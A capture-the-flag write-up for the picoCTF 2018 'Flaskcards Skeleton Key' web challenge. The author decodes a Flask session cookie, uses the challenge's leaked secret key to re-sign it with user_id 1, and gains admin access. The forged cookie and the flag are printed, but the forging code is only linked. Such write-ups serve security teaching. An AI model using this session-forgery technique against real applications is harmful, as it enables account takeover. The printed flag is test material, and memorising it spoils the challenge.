Tags: flask web 

Rating:

Problem Statement(600 points):

Nice! You found out they were sending the Secret_key: a7a8342f9b41fcb062b13dd1167785f8. Now, can you find a way to log in as admin? http://2018shell2.picoctf.com:53999 (link).

Tags : flask session cookie decode and encode

Solution :

This one redirects to the same website as of the previous flask question Flaskcards but in this they removed the vulnerability in the create card.In the question we were given a secret key.I clicked the admin button but it shows you are not admin.Then i read about the flask secret key and encountered that it is used to encode the cookie.So i checked the session coookie .It was following :

.eJwlT0tqQzEMvIvXWUiWLUu5zEO2JBoCLbyXrErvXpcyq2E-zHyXI8-4Psr9db7jVo6Hl3uR5dnR6szlHO6olgszFukkbVxTW5hxB_DNwbpOFUkKHEgEPah5AO8SqDBbnTUUe8qoqOzTBDjqhm1p1ZVBg7wpmNpoy8qtrOvM4_X1jM-9JzEkw2ivmQJEvF2sY2xGU7WpmEviX-59xfl_gsvPLzCJP70.DqM_4A.iqFjQnY8fW8svj0UMnST-5uQJm8

I decoded online using Flask session cookie decoder(https://www.kirsle.net/wizards/flask-session.cgi) and the decoded part appeared :

{
"_fresh": true,
"_id": "8cdf51a2bfcd6edd19afc1fec39b39462f94eaa6500d3940a59b988f3e1713305e34de06f51020b42b2e915f872196dba806e2e2ea42bc2cfe373d490a9a74ca",
"csrf_token": "f1e8fea3cd6b80336a7469776b83b99498ad8f1a",
"user_id": "6"
}

So for the admin i have to change the user_id.For admin the user_id should be either 0 or 1.
I tried to change the user_id to "1" using python code(click here for code) and the encoded cookie was as below :

.eJwlT0sKQjEMvEvXLpKmn8TLPNImQREU3tOVeHcrMqthPsy80xa7H5d0fu4vP6XtaumceFpU1DxiWnMzFI2J4ZNkkJSWQ4qrtgpgi4NWGcIc5NiRCKpTMYe2SiDDKHlkF6zBPaM0G8rQPC_okmae4dTJioCK9jI1ndI89tiej5vf155A53CltWYwELXlatL7YjREirAaB_5yr8P3_wlMny8wej-4.DqNCDg.QMUO2oagfXVHopREu5DsIYt4c2w

I changed the value of the session cookie and then clicked again the admin tab. i was awarded with the flag :

Your flag is: picoCTF{1_id_to_rule_them_all_92303c39}

Original writeup (https://github.com/d4rkvaibhav/PICOCTF-2018/tree/master/WEB_EXPLOITATION/Flaskcards%20Skeleton%20Key).